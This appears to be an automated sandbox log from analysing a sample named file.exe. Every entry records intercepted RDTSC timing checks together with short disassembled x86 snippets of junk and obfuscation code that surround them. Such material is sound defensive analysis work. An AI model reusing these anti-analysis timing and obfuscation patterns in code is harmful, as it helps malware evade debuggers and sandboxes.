Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCB637 second address: FCB6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jnp 00007FD8346DCB2Ah 0x0000000e mov bx, C073h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007FD8346DCB28h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a call 00007FD8346DCB36h 0x0000003f mov ebx, dword ptr [ebp+122D1CB0h] 0x00000045 pop edi 0x00000046 mov eax, dword ptr [ebp+122D0859h] 0x0000004c call 00007FD8346DCB2Ch 0x00000051 mov bh, al 0x00000053 pop ebx 0x00000054 push FFFFFFFFh 0x00000056 mov ebx, dword ptr [ebp+122D2CC5h] 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push edi 0x00000061 pop edi 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCC5CA second address: FCC5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD5B4 second address: FCD5B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD5B8 second address: FCD5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FD8346DB1F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCC7D4 second address: FCC7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB32h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD5C6 second address: FCD5E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD8346DB1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD8346DB201h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD5E5 second address: FCD5EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD5EC second address: FCD67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FD8346DB1F8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jmp 00007FD8346DB1FAh 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FD8346DB1F8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007FD8346DB1F8h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f jp 00007FD8346DB1FCh 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FD8346DB204h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF758 second address: FCF76A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jne 00007FD8346DCB26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD196C second address: FD1970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD0A74 second address: FD0A8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD281F second address: FD2823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2823 second address: FD2829 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD5863 second address: FD5913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FD8346DB205h 0x0000000f jo 00007FD8346DB1F6h 0x00000015 popad 0x00000016 popad 0x00000017 mov dword ptr [esp], eax 0x0000001a mov bh, ah 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FD8346DB1F8h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 jmp 00007FD8346DB205h 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007FD8346DB1F8h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 00000019h 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 jmp 00007FD8346DB201h 0x0000005e push eax 0x0000005f pushad 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD5913 second address: FD5922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD8346DCB26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD5922 second address: FD5926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7014 second address: FD7018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD7018 second address: FD701E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDD02E second address: FDD05B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FD8346DCB26h 0x0000000b jnp 00007FD8346DCB26h 0x00000011 jnl 00007FD8346DCB26h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e pop edx 0x0000001f jmp 00007FD8346DCB2Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDD05B second address: FDD05F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDD05F second address: FDD063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDD494 second address: FDD4AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD8346DB200h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop esi 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE25A9 second address: FE25C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD8346DCB2Ah 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jnp 00007FD8346DCB26h 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE25C6 second address: FE25CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE26A1 second address: FE26DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007FD8346DCB2Dh 0x00000013 pop eax 0x00000014 pop edx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jbe 00007FD8346DCB30h 0x0000001d pushad 0x0000001e push edi 0x0000001f pop edi 0x00000020 jno 00007FD8346DCB26h 0x00000026 popad 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE278E second address: FE27A7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD8346DB1FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE27A7 second address: FE27AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE27AB second address: FE27E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnc 00007FD8346DB209h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD8346DB1FFh 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD8346DB1FDh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE27E0 second address: FE27E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE77CE second address: FE77D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE77D4 second address: FE77E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FD8346DCB2Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE77E8 second address: FE7810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD8346DB201h 0x00000008 jmp 00007FD8346DB202h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE6CED second address: FE6CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE6E54 second address: FE6E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB203h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE9B98 second address: FE9BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007FD8346DCB2Ch 0x0000000b jno 00007FD8346DCB26h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEFF1D second address: FEFF79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB203h 0x00000007 jmp 00007FD8346DB1FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007FD8346DB207h 0x00000015 jmp 00007FD8346DB200h 0x0000001a jg 00007FD8346DB1F8h 0x00000020 je 00007FD8346DB1FEh 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEEC3C second address: FEEC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEEC40 second address: FEEC50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FD8346DB1FCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEE97E second address: FEE984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEE984 second address: FEE989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEF7D3 second address: FEF7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF452F second address: FF4544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD8346DB201h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9113 second address: FA237D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, ecx 0x0000000e jo 00007FD8346DCB2Dh 0x00000014 push esi 0x00000015 mov edx, 48F758D7h 0x0000001a pop edx 0x0000001b call dword ptr [ebp+122D2F99h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD8346DCB39h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB95F3 second address: FB95F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB95F7 second address: FB95FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB95FD second address: FB9603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB96C4 second address: FB96C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB97A8 second address: FB97FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 27A341EAh 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FD8346DB1F8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 sub ch, 00000061h 0x0000002b ja 00007FD8346DB1FCh 0x00000031 call 00007FD8346DB1F9h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD8346DB1FBh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB97FF second address: FB983D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jbe 00007FD8346DCB26h 0x00000013 jmp 00007FD8346DCB38h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB99AE second address: FB99EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB206h 0x00000009 popad 0x0000000a jmp 00007FD8346DB203h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FD8346DB1FCh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9A72 second address: FB9A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9A76 second address: FB9A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9A7C second address: FB9AAA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FD8346DCB26h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jg 00007FD8346DCB32h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a ja 00007FD8346DCB28h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9AAA second address: FB9AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD8346DB203h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9BD5 second address: FB9BFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD8346DCB2Eh 0x0000000e popad 0x0000000f push eax 0x00000010 jo 00007FD8346DCB38h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9BFF second address: FB9C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9CF2 second address: FB9D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB39h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9D10 second address: FB9D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD8346DB204h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FD8346DB1F8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 movzx edi, bx 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FD8346DB1F8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a ja 00007FD8346DB1F6h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9D7A second address: FB9D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9D8C second address: FB9D91 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBA16B second address: FBA18A instructions: 0x00000000 rdtsc 0x00000002 js 00007FD8346DCB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD8346DCB33h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBA573 second address: FBA5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FD8346DB1F8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 adc edx, 60C17662h 0x00000027 lea eax, dword ptr [ebp+12488E6Ah] 0x0000002d mov ecx, dword ptr [ebp+12462940h] 0x00000033 xor dx, D16Ah 0x00000038 nop 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jbe 00007FD8346DB1F6h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBA5B9 second address: FBA5CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBA5CB second address: FBA60A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jne 00007FD8346DB1F8h 0x0000000f push eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop eax 0x00000013 popad 0x00000014 nop 0x00000015 jne 00007FD8346DB1FBh 0x0000001b lea eax, dword ptr [ebp+12488E26h] 0x00000021 mov dword ptr [ebp+122D220Dh], edi 0x00000027 xor dword ptr [ebp+122D2255h], edi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jp 00007FD8346DB1F8h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBA60A second address: FA2EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call dword ptr [ebp+12468CBBh] 0x00000012 js 00007FD8346DCB3Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007FD8346DCB26h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3591 second address: FF3597 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3597 second address: FF359D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3703 second address: FF3708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3859 second address: FF38A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jns 00007FD8346DCB26h 0x0000000b jmp 00007FD8346DCB32h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD8346DCB39h 0x00000018 jmp 00007FD8346DCB30h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF38A2 second address: FF38D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD8346DB1FFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF38D3 second address: FF38EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF38EF second address: FF38FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FD8346DB1F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3A78 second address: FF3A9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD8346DCB2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FD8346DCB2Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3A9D second address: FF3ACA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB204h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD8346DB203h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3ACA second address: FF3ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3ACE second address: FF3AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF3F1B second address: FF3F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD8346DCB26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
